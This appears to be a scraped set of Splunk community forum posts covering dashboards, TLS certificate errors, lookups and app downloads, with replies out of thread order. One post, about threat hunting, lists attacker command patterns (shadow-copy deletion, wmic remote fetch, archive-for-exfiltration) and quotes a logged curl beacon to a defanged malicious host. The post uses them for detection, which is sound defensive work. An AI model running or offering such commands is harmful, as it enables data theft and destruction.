All Posts

Need a report based on the previous day. I have source IP segment xx.xx.xx.xx/28 and destination IP segment xx.xx.xx/24. The outcome of the query should provide the below:

    Date and start + end time of the connection
    USERNAME
    APPLICATION:PORT & PROTOCOL
    APPLICATION SEGMENTS
    ACCESS POLICY NAME
    ACTION

How can I create a customized dashboard? Please suggest.
It would help if you could share some anonymised raw events in a code block to prevent formatting corruption; that way we can see what you are working with and be better able to guide you.
Try a couple of things. Add the below (YOUR CA CERT) to inputs.conf under [SSL], then restart:

    [SSL]
    rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem

Run these to validate the certs; see if they read and show information:

    openssl rsa -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text
    openssl x509 -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text -noout
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have an ioc_check table containing command strings and descriptions as below:

    commands                      description
    7z a -t7z -r                  Compress data for exfiltration
    vssadmin.* Delete Shadows     Deletion of Shadow copy
    *wmic*process*call*create*    Uses WMI to create processes
    wmic*get*http                 Using wmic to get and run files from internet

I am using this lookup table's commands strings against the CrowdStrike CommandLine to hunt for any matching commands run by any user in our environment. So when the CommandLine field from CrowdStrike logs matches any commands string from the lookup table, it should generate an alert. What we are trying to achieve is that when there is an alert it should also tell us the description of the matching command, so we know which command matched the CrowdStrike CommandLine. The final result should look like this:

    CommandLine: curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d
    description: Using wmic to get and run files from internet
    commands:    wmic*get*http

I have come up with the below search. It gives me an alert but is not able to display the matching command and description. Any help would be much appreciated!

    index=crowdstrike event_simpleName=ProcessRollup2
        [| inputlookup ioc_check
         | eval CommandLine="*"+commands+"*"
         | fields CommandLine]
    | lookup ioc_check commands OUTPUT description
    | table _time, CommandLine, description, commands
Hmm. I still get the same error.

Certs permissions: [screenshot]

After restart, splunkd.log: [screenshot]
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented. It's tribal knowledge, and now you're part of the tribe. Seriously, you can use your browser's console to view the REST commands sent for the UI's Searches, Reports, and Alerts dashboard to see how the two types are differentiated.
Hello, I'm still new to SPLUNK and still learning, so apologies for any incorrect naming. I have a search in SPLUNK that runs daily and does some filtering to then look up an indexed .csv for additional information. The indexed .csv is injected into SPLUNK daily and the files are called "YYYY-MM-DD Report.csv". The search is supposed to take that into consideration and look at the latest report based on the date in the subject. It currently looks like this:

    | rename Letter as C1111
    | table A1111, B1111, C1111
    | join type=left C1111
        [ search earliest=-24h host="AAA" index="BBB" sourcetype="CCC"
        | eval dateFile=strftime(now(), "%Y-%m-%d")
        | where like(source,"%".dateFile."%Report.csv")
        | rename "Number" as C1111
        | eval C1111=lower(C1111)
        | fields C1111, "1 xxxx","2 yyyy","3 zzzz"]
    | table A1111, B1111, C1111, "1 xxxx","2 yyyy","3 zzzz"

This used to work but stopped a few days back, and I'm unable to figure out what the issue might be.
From the screenshot of file permissions, the files look like they belong to root; set them for the splunk user and try that.
Hi @Zazou, apps.splunk.com should be sufficient to download apps, but anyway, you can do this from your workstation, without opening any firewall route (that's better!). Ciao. Giuseppe
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. Any other URLs I need to allow?
Tried that already, no dice.
Try this for starters:

    blacklist1 = EventCode="4663" Message="Account Name:\s+COMPUTER8-55\$"
Hi @SplunkerNoob, as I said, look in the Security Essentials App and you'll find hundreds of searches, also for threat hunting. Ciao. Giuseppe
Hello. I'm new at Splunk. Recently, I have been trying to create and sign my own TLS certificates, following this official guide: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcertificates

However, splunkd.log keeps showing this error:

    Error setting up SSL for TCP data input from file=inputs.conf stanza="SSL": Can't read key file /opt/splunk/etc/auth/mycerts/myServerCertificate.pem SSL error code=151441516 message="error:0906D06C:PEM routines:PEM_read_bio:no start line"

First, by following the guide, I created:

    private key of the root certificate authority certificate, which is myCertAuthPrivateKey.key
    CSR for the certificate, which is myCertAuthCertificate.csr
    root certificate authority certificate, which is myCertAuthCertificate.pem

Moreover, I created a server certificate and signed it with the root certificate authority certificate:

    private key for the server certificate, which is myServerPrivateKey.key
    CSR for the server certificate, which is myServerCertificate.csr
    server certificate, which is myServerCertificate.pem

Basically, following the guide, I have 6 files in the mycerts folder, and one .srl file (6+1 files for certificates). This Splunk Master is a master node connected to 3 indexers (clustering). I followed this guide to modify the configuration files, which are inputs.conf and server.conf I believe. Ref: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/ConfigureSplunkforwardingtousesignedcertificates

/opt/splunk/etc/system/local/server.conf

    [general]
    ...
    [sslConfig]
    sslRootCAPath = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem
    sslPassword = mypassword
    ...

/opt/splunk/etc/system/local/inputs.conf

    [splunktcp-ssl:9997]
    disabled=0
    [SSL]
    serverCert = /opt/splunk/etc/auth/mycerts/myServerCertificate.pem
    sslPassword = mypassword
    requireClientCert = true
    sslVersions = *,-ssl2

Every time I do service splunk restart, I still get the SSL error. Does anyone know why and what's happening?
The same error is also happening on any other indexes (same steps as I mentioned above).
What other indicators would there be that distinguish it as reports only? And also, how do you know that "alert_type=always" is an attribute that singles out reports? I can't find this info anywhere.
My question is what else should I put on there.
Hi @SplunkNinja, good for you, see you next time! Let us know if we can help you more, or, please, accept one answer for the other people of the Community. Ciao and happy splunking. Giuseppe P.S.: Karma Points are appreciated by all the contributors.
Time: 4/27/24 5:30:37.182 AM

Event:

    {
      "Client":"ClientA",
      "Msgtype":"WebService",
      "Priority":2,
      "Interactionid":"1DD6AA27-6517-4D62-84C1-C58CA124516C",
      "Seq":15831,
      "Threadid":23,
      "message":"TimeMarker: MyClient: Result=Success Time=0000.05s Message=No payments found. (RetrievePaymentsXY - ID1:123131 ID2:Site|12313 ID3:05/14/2024-07/12/2024 1|12313",
      "Userid":"Unknown"
    }

I just want to make sure that I state it right: when I run the following query, I get an output already, so the JSON and fields are all correct. It is just that my JSON was messed up when I massaged it (please ignore):

    index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error
    | rex field=message "Message=.* \((?<apiName>\w+?) -"
    | lookup My_Client_Mapping Client OUTPUT ClientID ClientName Region
    | chart count over ClientName by apiName

where `chart count over` is at the end. But when I move the `lookup` statement after `chart`, I don't get any data back. If I remove the `lookup`, the query won't work, as `ClientName` is stored in the lookup mapping file.
Thanks for your reply. In the end, the solution was just to disable the Splunk light forwarder via the CLI:

    ./splunk disable app SplunkLightForwarder

After this change I restarted the splunk service and it worked fine again.
I narrowed the issue down to an add-on and then updated to the latest version. This fixed the problem. Thanks for your help @gcusello and @PickleRick